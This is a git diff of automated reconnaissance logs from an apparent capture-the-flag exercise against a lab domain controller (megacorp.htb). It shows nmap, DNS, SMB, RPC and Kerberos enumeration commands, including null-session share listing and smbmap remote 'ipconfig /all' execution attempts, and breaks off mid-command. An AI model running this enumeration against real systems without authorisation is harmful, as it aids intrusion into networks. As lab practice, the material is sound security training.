@@ -0,0 +1,21 @@ +```bash +dig AXFR -p 53 @10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_zone-transfer.txt): + +``` +;; communications error to 10.129.243.131#53: timed out +;; communications error to 10.129.243.131#53: timed out + +; <<>> DiG 9.18.11-2-Debian <<>> AXFR -p 53 @10.129.243.131 +; (1 server found) +;; global options: +cmd +;; Query time: 4299 msec +;; SERVER: 10.129.243.131#53(10.129.243.131) (UDP) +;; WHEN: Sat Oct 28 14:15:33 CEST 2023 +;; MSG SIZE rcvd: 28 + + + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/Nmap DNS.md b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/Nmap DNS.md new file mode 100644 index 00000000..db514546 --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/report/report.md/10.129.243.131/Services/Service - udp-53-domain/Nmap DNS.md 
@@ -0,0 +1,40 @@ +```bash +nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131 +``` + +[/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt](file:///home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt): + +``` +# Nmap 7.93 scan initiated Sat Oct 28 14:15:18 2023 as: nmap -vv --reason -Pn -T4 -sU -sV -p 53 "--script=banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt -oX /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml 10.129.243.131 +Nmap scan report for megacorp.htb (10.129.243.131) +Host is up, received user-set. +Scanned at 2023-10-28 14:15:19 CEST for 116s + +PORT STATE SERVICE REASON VERSION +53/udp open domain? udp-response +| fingerprint-strings: +| DNS-SD: +| _services +| _dns-sd +| _udp +|_ local +| dns-nsec3-enum: +|_ DNSSEC NSEC3 not supported +|_dns-cache-snoop: 0 of 100 tested domains are cached. +| dns-nsec-enum: +|_ No NSEC records found +1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : +SF-Port53-UDP:V=7.93%I=7%D=10/28%Time=653CFB97%P=x86_64-pc-linux-gnu%r(AFS +SF:VersionRequest,20,"\0\0\x83\x81\0\0\0\0\0\0\0e\0\0\0\0\0\0\0\0\r\x05\0\ +SF:0\0\0\0\0\0\0\0\0")%r(DNS-SD,2E,"\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_servi +SF:ces\x07_dns-sd\x04_udp\x05local\0\0\x0c\0\x01"); + +Host script results: +| dns-brute: +|_ DNS Brute-force hostnames: No results. 
+ +Read data files from: /usr/bin/../share/nmap +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +# Nmap done at Sat Oct 28 14:17:15 2023 -- 1 IP address (1 host up) scanned in 116.97 seconds + +``` diff --git a/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_commands.log b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_commands.log new file mode 100644 index 00000000..f171236d --- /dev/null +++ b/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_commands.log 
@@ -0,0 +1,288 @@ +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX 
"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 
--script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49667 
--script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/tcp_49667_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/xml/tcp_49667_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49673 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/tcp_49673_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49673/xml/tcp_49673_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49695 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/tcp_49695_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/xml/tcp_49695_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49843 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/tcp_49843_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49843/xml/tcp_49843_rpc_nmap.xml" 10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX 
"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format 
png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX 
"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 2>&1 + +smbmap -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -R 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -R 2>&1 + +smbmap -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 139 -x "ipconfig /all" 2>&1 + +smbmap -u null -p "" -H 10.129.243.131 -P 445 -x "ipconfig /all" 2>&1 + +dig -p 53 -x 10.129.243.131 @10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/udp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp53/xml/udp_53_dns_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -sV -p 123 --script="banner,(ntp* or ssl*) and not (brute or broadcast or 
dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/udp_123_ntp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/udp123/xml/udp_123_ntp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_quick_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_quick_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_full_tcp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_full_tcp_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sU -A --top-ports 100 -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/_top_100_udp_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/xml/_top_100_udp_nmap.xml" 10.129.243.131 + +dnsrecon -n 10.129.243.131 -d megacorp.htb 2>&1 + +dig -p 53 -x 10.129.243.131 
@10.129.243.131 + +dig AXFR -p 53 @10.129.243.131 megacorp.htb + +nmap -vv --reason -Pn -T4 -sV -p 53 --script="banner,(dns* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_dns_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/xml/tcp_53_dns_nmap.xml" 10.129.243.131 + +gobuster dns -d megacorp.htb -r 10.129.243.131 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp53/tcp_53_megacorp.htb_subdomains_subdomains-top1million-110000.txt" + +feroxbuster -u http://10.129.243.131:80/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt" + +curl -sSikf http://10.129.243.131:80/.well-known/security.txt + +curl -sSikf http://10.129.243.131:80/robots.txt + +curl -sSik http://10.129.243.131:80/ + +nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.129.243.131 + +curl -sk -o /dev/null -H "Host: buoTkusKMRHQqExxyMge.megacorp.htb" http://megacorp.htb:80/ -w "%{size_download}" + +whatweb --color=never --no-errors -a 3 -v http://10.129.243.131:80 2>&1 + +wkhtmltoimage --format png http://10.129.243.131:80/ /home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp80/tcp_80_http_screenshot.png + +nmap -vv --reason -Pn -T4 -sV -p 88 --script="banner,krb5-enum-users" --script-args 
krb5-enum-users.realm="megacorp.htb",userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/tcp_88_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp88/xml/tcp_88_kerberos_nmap.xml" 10.129.243.131 + +impacket-getArch -target 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 135 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/tcp_135_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp135/xml/tcp_135_rpc_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 135 10.129.243.131 + +enum4linux -a -M -l -d 10.129.243.131 2>&1 + +nbtscan -rvh 10.129.243.131 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 139 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/tcp_139_smb_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp139/xml/tcp_139_smb_nmap.xml" 10.129.243.131 + +smbclient -L //10.129.243.131 -N -I 10.129.243.131 2>&1 + +smbmap -H 10.129.243.131 -P 139 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 389 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/tcp_389_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp389/xml/tcp_389_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 445 --script="banner,(nbstat or smb* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/tcp_445_smb_nmap.txt" -oX 
"/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp445/xml/tcp_445_smb_nmap.xml" 10.129.243.131 + +smbmap -H 10.129.243.131 -P 445 2>&1 + +nmap -vv --reason -Pn -T4 -sV -p 464 --script="banner,krb5-enum-users" --script-args krb5-enum-users.realm="megacorp.htb",userdb="/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/tcp_464_kerberos_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp464/xml/tcp_464_kerberos_nmap.xml" 10.129.243.131 + +impacket-rpcdump -port 593 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 3268 --script="banner,(ldap* or ssl*) and not (brute or broadcast or dos or external or fuzzer)" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/tcp_3268_ldap_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp3268/xml/tcp_3268_ldap_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49667 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/tcp_49667_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49667/xml/tcp_49667_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49695 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/tcp_49695_rpc_nmap.txt" -oX "/home/simon/CTF/LaokoonHaxorcist/fullpwn/results/10.129.243.131/scans/tcp49695/xml/tcp_49695_rpc_nmap.xml" 10.129.243.131 + +nmap -vv --reason -Pn -T4 -sV -p 49843 --script="banner,msrpc-enum,rpc-grind,rpcinfo" -oN 